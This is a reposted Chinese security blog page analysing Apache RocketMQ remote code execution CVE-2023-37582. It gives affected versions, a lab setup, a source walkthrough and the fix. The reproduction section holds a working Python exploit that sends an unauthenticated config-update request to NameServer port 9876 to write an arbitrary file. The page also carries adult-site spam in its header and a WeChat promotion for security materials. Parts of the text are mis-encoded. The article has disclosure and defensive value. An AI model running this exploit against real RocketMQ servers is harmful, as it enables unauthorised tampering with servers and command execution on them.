国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Apache RocketMQ 遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-37582)

這篇具有很好參考價(jià)值的文章主要介紹了Apache RocketMQ 遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-37582)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

?文章來源地址http://www.zghlxwxcb.cn/news/detail-618537.html

漏洞簡(jiǎn)介

Apache RocketMQ是一款低延遲、高并發(fā)、高可用、高可靠的分布式消息中間件。CVE-2023-37582 中,由于對(duì) CVE-2023-33246 修復(fù)不完善,導(dǎo)致在Apache RocketMQ NameServer 存在未授權(quán)訪問的情況下,攻擊者可構(gòu)造惡意請(qǐng)求以RocketMQ運(yùn)行的系統(tǒng)用戶身份執(zhí)行命令。

影響版本

Apache RocketMQ <= 5.1.1?Apache RocketMQ <= 4.9.6

環(huán)境搭建

參考 Apache RocketMQ 遠(yuǎn)程代碼執(zhí)行漏洞 CVE-2023-33246 的環(huán)境搭建

還是為了方便進(jìn)行調(diào)試,我們?cè)?linux 下搭建 RocketMQ 的相關(guān)服務(wù),利用源碼啟動(dòng)

一共需要運(yùn)行兩個(gè)服務(wù)

org.apache.rocketmq.namesrv.NamesrvStartup
org.apache.rocketmq.broker.BrokerStartup

先啟動(dòng) NamesrvStartup,再啟動(dòng) BrokerStartup 同時(shí)都需要配置環(huán)境變量 ROCKETMQ_HOME?ROCKETMQ_HOME\=/home/ubuntu/Desktop/rocketmq-rocketmq-all-5.1.0

?

?

漏洞復(fù)現(xiàn)

運(yùn)行 python 腳本

import socket
import binascii
client = socket.socket()
?
# you ip
client.connect(('192.168.222.130',9876))
?
# data
json = '{"code":318,"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
body='configStorePath=/tmp/test.txt\nproductEnvName=123\\ntest'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2) # 一個(gè)字節(jié)是2個(gè)十六進(jìn)制數(shù)
head1 = '00000000'+str(hex(json_lens))[2:] ? ? ?# hex(xxxx) 0x1243434 去掉 0x
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
?
# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)

?

成功在 tmp 目錄下的 test.txt 文件中寫入指定字符串 test

【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料免費(fèi)領(lǐng)!加vx:yj009991,備注 “博客園” 獲??!】

?、?網(wǎng)安學(xué)習(xí)成長路徑思維導(dǎo)圖
?、?60+網(wǎng)安經(jīng)典常用工具包
 ③ 100+SRC漏洞分析報(bào)告
?、?150+網(wǎng)安攻防實(shí)戰(zhàn)技術(shù)電子書
?、?最權(quán)威CISSP 認(rèn)證考試指南+題庫
 ⑥ 超1800頁CTF實(shí)戰(zhàn)技巧手冊(cè)
?、?最新網(wǎng)安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測(cè)指南(安卓+IOS)

漏洞分析

org/apache/rocketmq/remoting/protocol/RequestCode.java? code 代表調(diào)用不同的功能,此時(shí)調(diào)用的是318 更新配置的操作

src/main/java/org/apache/rocketmq/remoting/protocol/RequestCode.java?

根據(jù)對(duì)應(yīng)的 code 會(huì)調(diào)用 對(duì)應(yīng)的函數(shù)進(jìn)行處理

src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java?

?

src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java#updateConfig?

??src/main/java/org/apache/rocketmq/remoting/Configuration.java#update?

??

首先判斷是不是屬于可控的屬性

src/main/java/org/apache/rocketmq/remoting/Configuration.java#persist?

?src/main/java/org/apache/rocketmq/remoting/Configuration.java#getStorePath?

調(diào)用?getStorePath? 獲取文件路徑,此時(shí)獲取的值是 configStorePath 的值

src/main/java/org/apache/rocketmq/common/MixAll.java#string2File?

??src/main/java/org/apache/rocketmq/common/MixAll.java#string2FileNotSafe?

??src/main/java/org/apache/rocketmq/common/utils/IOTinyUtils.java#writeStringToFile?

?

漏洞修復(fù)

修改禁用修改配置路徑的參數(shù)

更多網(wǎng)安技能的在線實(shí)操練習(xí),請(qǐng)點(diǎn)擊這里>>

?

到了這里,關(guān)于Apache RocketMQ 遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-37582)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 復(fù)現(xiàn)CVE-2021-44228-Apache Log4j2遠(yuǎn)程代碼執(zhí)行漏洞

    復(fù)現(xiàn)CVE-2021-44228-Apache Log4j2遠(yuǎn)程代碼執(zhí)行漏洞

    復(fù)現(xiàn)CVE-2021-44228-Apache Log4j2遠(yuǎn)程代碼執(zhí)行漏洞 目錄 前言 漏洞原理 影響范圍 環(huán)境搭建漏洞復(fù)現(xiàn) 使用工具JNDIExploit-1.2-SNAPSHOT.jar 近期Apache Log4j2被暴露了一個(gè)嚴(yán)重的遠(yuǎn)程代碼執(zhí)行安全漏洞(CVE-2021-44228),有嚴(yán)重的安全風(fēng)險(xiǎn)。Apache Log4j2是一款優(yōu)秀的Java日志框架, 被廣泛地應(yīng)用在

    2024年02月05日
    瀏覽(28)
  • 【Citrix篇】1-Citrix ADC/Gateway 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-3519和升級(jí)方法

    【Citrix篇】1-Citrix ADC/Gateway 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-3519和升級(jí)方法

    目錄 一、前言 二、實(shí)驗(yàn)效果 三、影響的版本(CVE-2023-3519) 四、升級(jí)前準(zhǔn)備 五、命令行升級(jí)步驟 六、GUi界面升級(jí)步驟 七、公司介紹 近期我們收到Citrix發(fā)布關(guān)于NetScaler ADC 、NetScaler Gateway的風(fēng)險(xiǎn)通告,漏洞編號(hào)為CVE-2023-3519, 漏洞等級(jí):嚴(yán)重,漏洞評(píng)分:9.8 漏洞影響 :Hack可

    2024年02月08日
    瀏覽(20)
  • Apache Druid中Kafka配置遠(yuǎn)程代碼執(zhí)行漏洞(MPS-2023-6623)

    Apache Druid中Kafka配置遠(yuǎn)程代碼執(zhí)行漏洞(MPS-2023-6623)

    Apache Druid 是一個(gè)高性能的數(shù)據(jù)分析引擎。 Kafka Connect模塊曾出現(xiàn)JNDI注入漏洞(CVE-2023-25194),近期安全研究人員發(fā)現(xiàn)Apache Druid由于支持從 Kafka 加載數(shù)據(jù)的實(shí)現(xiàn)滿足其利用條件,攻擊者可通過修改 Kafka 連接配置屬性進(jìn)行 JNDI 注入攻擊,進(jìn)而在服務(wù)端執(zhí)行任意惡意代碼。 Apache Dru

    2024年02月07日
    瀏覽(26)
  • 03Apache Solr 遠(yuǎn)程命令執(zhí)行漏洞(CVE-2019-0193)

    0x01 漏洞介紹 Apache Solr 是一個(gè)開源的搜索服務(wù)器。Solr 使用 Java 語言開發(fā),主要基于 HTTP 和 Apache Lucene 實(shí)現(xiàn)。 此次漏洞出現(xiàn)在 Apache Solr 的 DataImportHandler ,該模塊是一個(gè)可選但常用的模塊,用于從數(shù)據(jù)庫和其他源中提取數(shù)據(jù)。它具有一個(gè)功能,其中所有的 DIH配置都可以通過外

    2024年02月09日
    瀏覽(17)
  • CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞原理 log4j(log for java)是由Java編寫的可靠、靈活的日志框架,是Apache旗下的一個(gè)開源項(xiàng)目,使用Log4j,我們更加方便的記錄了日志信息,它不但能控制日志輸出的目的地,也能控制日志輸出的內(nèi)容格式;通過定義不同的日志級(jí)別,可以更加精確的控制日志的生成過程,

    2024年02月08日
    瀏覽(33)
  • Windows Server 2012 R2服務(wù)器Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-21554補(bǔ)丁KB5025288的安裝及問題解決

    Windows Server 2012 R2服務(wù)器Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-21554補(bǔ)丁KB5025288的安裝及問題解決

    近日,系統(tǒng)安全掃描中發(fā)現(xiàn)Windows Server 2012 R2服務(wù)器存在Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞。本文記錄補(bǔ)丁安裝中遇到的“此更新不適用于你的計(jì)算機(jī)”問題及解決辦法。 一、問題描述: 1、系統(tǒng)安全掃描中發(fā)現(xiàn)Windows Server 2012 R2服務(wù)器存在Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞,

    2024年02月10日
    瀏覽(25)
  • Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞(CVE-2017-5638)復(fù)現(xiàn)

    Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞(CVE-2017-5638)復(fù)現(xiàn)

    Apache Struts2是Apache項(xiàng)目下的一個(gè)web 框架,幫助Java開發(fā)者利用J2EE來開發(fā)Web相關(guān)應(yīng)用。 Apache Struts2的Jakarta Multipart parser插件存在遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可以在使用該插件上傳文件時(shí),修改HTTP請(qǐng)求頭中的Content-Type值來觸發(fā)該漏洞,導(dǎo)致遠(yuǎn)程執(zhí)行代碼。 Struts 2.3.5 – Struts 2.3.3

    2024年02月15日
    瀏覽(31)
  • 漏洞復(fù)現(xiàn)-Drupal遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-7602)

    漏洞復(fù)現(xiàn)-Drupal遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-7602)

    Drupal 7.x 和 8.x 的多個(gè)子系統(tǒng)中存在一個(gè)遠(yuǎn)程執(zhí)行代碼漏洞。這可能允許攻擊者利用 Drupal 站點(diǎn)上的多個(gè)攻擊媒介,從而導(dǎo)致該站點(diǎn)受到威脅。此漏洞與 Drupal 核心 - 高度關(guān)鍵 - 遠(yuǎn)程代碼執(zhí)行 - SA-CORE-2018-002 有關(guān)。SA-CORE-2018-002 和此漏洞都在野外被利用。 -c 后面接命令,緊隨賬號(hào)

    2024年02月16日
    瀏覽(23)
  • Office遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    Office遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    CVE-2017-11882允許攻擊者在當(dāng)前用戶的上下文中運(yùn)行任意代碼,導(dǎo)致無法正確處理內(nèi)存中的對(duì)象,即為“ Microsoft Office Memory Corruption Vulnerability “,棧溢出的遠(yuǎn)程執(zhí)行漏洞 該漏洞是在 EQNEDT32.EXE 組件的緩沖區(qū)溢出導(dǎo)致。當(dāng)受害用戶打開Office文檔時(shí)就有可能被漏洞利用,危害極大。

    2024年02月12日
    瀏覽(24)
  • CVE-2019-0708遠(yuǎn)程桌面服務(wù)遠(yuǎn)程執(zhí)行代碼漏洞復(fù)現(xiàn)

    CVE-2019-0708遠(yuǎn)程桌面服務(wù)遠(yuǎn)程執(zhí)行代碼漏洞復(fù)現(xiàn)

    1、相關(guān)簡(jiǎn)介 Windows再次被曝出一個(gè)破壞力巨大的高危遠(yuǎn)程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標(biāo)系統(tǒng)上執(zhí)行任意代碼,包括獲取敏感信息、執(zhí)行遠(yuǎn)程代碼、發(fā)起拒絕服務(wù)攻擊等等攻擊行為。2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了windows遠(yuǎn)程桌面服務(wù)的遠(yuǎn)

    2024年02月10日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包